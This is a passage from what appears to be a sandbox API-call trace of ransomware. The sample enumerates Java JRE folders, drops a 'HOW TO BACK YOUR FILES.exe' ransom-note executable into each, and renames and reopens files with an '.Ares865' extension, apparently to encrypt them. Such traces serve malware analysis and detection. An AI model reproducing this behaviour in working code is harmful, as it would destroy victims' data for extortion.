lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs" [0137.332] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs" [0137.332] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0137.332] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0137.333] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0137.333] GetLastError () returned 0x0 [0137.334] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0137.334] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531c5c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531c5c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0137.334] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.334] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0137.334] lstrcpyW (in: lpString1=0x2cce460, lpString2="jqs.conf" | out: lpString1="jqs.conf") returned="jqs.conf" [0137.334] lstrlenW (lpString="jqs.conf") returned 8 [0137.334] lstrlenW (lpString="Ares865") returned 7 [0137.334] lstrcmpiW (lpString1="qs.conf", lpString2="Ares865") returned 1 [0137.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf.Ares865") returned 64 [0137.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf.ares865"), dwFlags=0x1) returned 1 [0137.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqs.conf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqs.conf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.336] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40814) returned 1 [0137.342] lstrcpyW (in: lpString1=0x2cce460, lpString2="jqsmessages.properties" | out: lpString1="jqsmessages.properties") returned="jqsmessages.properties" [0137.342] lstrlenW (lpString="jqsmessages.properties") returned 22 [0137.342] lstrlenW (lpString="Ares865") returned 7 [0137.342] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0137.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.Ares865") returned 78 [0137.342] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.ares865"), dwFlags=0x1) returned 1 [0137.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\jqsmessages.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.344] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1720) returned 1 [0137.349] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm" [0137.349] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm" [0137.349] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0137.349] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0137.350] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0137.350] GetLastError () returned 0x0 [0137.351] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0137.351] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531ebde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531ebde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0137.351] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.351] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0137.351] lstrcpyW (in: lpString1=0x2cce452, lpString2="CIEXYZ.pf" | out: lpString1="CIEXYZ.pf") returned="CIEXYZ.pf" [0137.351] lstrlenW (lpString="CIEXYZ.pf") returned 9 [0137.351] lstrlenW (lpString="Ares865") returned 7 [0137.351] lstrcmpiW (lpString1="EXYZ.pf", lpString2="Ares865") returned 1 [0137.352] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf.Ares865") returned 58 [0137.352] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf.ares865"), dwFlags=0x1) returned 1 [0137.354] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.354] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51236) returned 1 [0137.361] lstrcpyW (in: lpString1=0x2cce452, lpString2="GRAY.pf" | out: lpString1="GRAY.pf") returned="GRAY.pf" [0137.361] lstrlenW (lpString="GRAY.pf") returned 7 [0137.361] lstrlenW (lpString="Ares865") returned 7 [0137.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf.Ares865") returned 56 [0137.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf.ares865"), dwFlags=0x1) returned 1 [0137.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.364] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=632) returned 1 [0137.370] lstrcpyW (in: lpString1=0x2cce452, lpString2="LINEAR_RGB.pf" | out: lpString1="LINEAR_RGB.pf") returned="LINEAR_RGB.pf" [0137.370] lstrlenW (lpString="LINEAR_RGB.pf") returned 13 [0137.370] lstrlenW (lpString="Ares865") returned 7 [0137.370] lstrcmpiW (lpString1="_RGB.pf", lpString2="Ares865") returned -1 [0137.371] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf.Ares865") returned 62 [0137.371] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf.ares865"), dwFlags=0x1) returned 1 [0137.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.375] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1044) returned 1 [0137.378] lstrcpyW (in: lpString1=0x2cce452, lpString2="PYCC.pf" | out: lpString1="PYCC.pf") returned="PYCC.pf" [0137.378] lstrlenW (lpString="PYCC.pf") returned 7 [0137.378] lstrlenW (lpString="Ares865") returned 7 [0137.378] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf.Ares865") returned 56 [0137.378] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf.ares865"), dwFlags=0x1) returned 1 [0137.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=274474) returned 1 [0137.410] lstrcpyW (in: lpString1=0x2cce452, lpString2="sRGB.pf" | out: lpString1="sRGB.pf") returned="sRGB.pf" [0137.410] lstrlenW (lpString="sRGB.pf") returned 7 [0137.410] lstrlenW (lpString="Ares865") returned 7 [0137.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf.Ares865") returned 56 [0137.410] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf.ares865"), dwFlags=0x1) returned 1 [0137.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3144) returned 1 [0137.416] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" [0137.416] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" [0137.416] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0137.416] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\applet\\how to back your files.exe"), bFailIfExists=1) returned 0 [0137.417] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0137.418] GetLastError () returned 0x0 [0137.418] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0137.418] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531ebde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531ebde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0137.418] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.418] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0137.418] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin" [0137.419] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin" [0137.419] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0137.419] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\how to back your files.exe"), bFailIfExists=1) returned 0 [0137.419] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0137.420] GetLastError () returned 0x0 [0137.420] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0137.420] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53211f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53211f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0137.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.420] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0137.421] lstrcpyW (in: lpString1=0x2cce44a, lpString2="awt.dll" | out: lpString1="awt.dll") returned="awt.dll" [0137.421] lstrlenW (lpString="awt.dll") returned 7 [0137.421] lstrlenW (lpString="Ares865") returned 7 [0137.421] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.Ares865") returned 52 [0137.421] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll.ares865"), dwFlags=0x1) returned 1 [0137.423] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.423] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1173416) returned 1 [0137.511] lstrcpyW (in: lpString1=0x2cce44a, lpString2="axbridge.dll" | out: lpString1="axbridge.dll") returned="axbridge.dll" [0137.511] lstrlenW (lpString="axbridge.dll") returned 12 [0137.511] lstrlenW (lpString="Ares865") returned 7 [0137.511] lstrcmpiW (lpString1="dge.dll", lpString2="Ares865") returned 1 [0137.512] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.Ares865") returned 57 [0137.512] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll.ares865"), dwFlags=0x1) returned 1 [0137.514] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.515] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153000) returned 1 [0137.538] lstrcpyW (in: lpString1=0x2cce44a, lpString2="client" | out: lpString1="client") returned="client" [0137.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0137.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df770 [0137.539] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0137.539] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x743b2580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x743b2580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x22ba8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dcpr.dll", cAlternateFileName="")) returned 1 [0137.539] lstrcmpiW (lpString1="dcpr.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.539] lstrcmpiW (lpString1="dcpr.dll", lpString2="aoldtz.exe") returned 1 [0137.539] lstrcpyW (in: lpString1=0x2cce44a, lpString2="dcpr.dll" | out: lpString1="dcpr.dll") returned="dcpr.dll" [0137.539] lstrlenW (lpString="dcpr.dll") returned 8 [0137.539] lstrlenW (lpString="Ares865") returned 7 [0137.539] lstrcmpiW (lpString1="cpr.dll", lpString2="Ares865") returned 1 [0137.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll.Ares865") returned 53 [0137.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll.ares865"), dwFlags=0x1) returned 1 [0137.542] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dcpr.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dcpr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.542] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=142248) returned 1 [0137.553] lstrcpyW (in: lpString1=0x2cce44a, lpString2="decora-sse.dll" | out: lpString1="decora-sse.dll") returned="decora-sse.dll" [0137.553] lstrlenW (lpString="decora-sse.dll") returned 14 [0137.553] lstrlenW (lpString="Ares865") returned 7 [0137.553] lstrcmpiW (lpString1="sse.dll", lpString2="Ares865") returned 1 [0137.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll.Ares865") returned 59 [0137.553] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll.ares865"), dwFlags=0x1) returned 1 [0137.555] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62888) returned 1 [0137.561] lstrcpyW (in: lpString1=0x2cce44a, lpString2="deploy.dll" | out: lpString1="deploy.dll") returned="deploy.dll" [0137.561] lstrlenW (lpString="deploy.dll") returned 10 [0137.561] lstrlenW (lpString="Ares865") returned 7 [0137.561] lstrcmpiW (lpString1="loy.dll", lpString2="Ares865") returned 1 [0137.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll.Ares865") returned 55 [0137.561] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll.ares865"), dwFlags=0x1) returned 1 [0137.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=364456) returned 1 [0137.584] lstrcpyW (in: lpString1=0x2cce44a, lpString2="dtplugin" | out: lpString1="dtplugin") returned="dtplugin" [0137.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0137.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f1fc8 [0137.584] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0137.584] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x743b2580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x743b2580, ftLastWriteTime.dwHighDateTime=0x1d2e627, 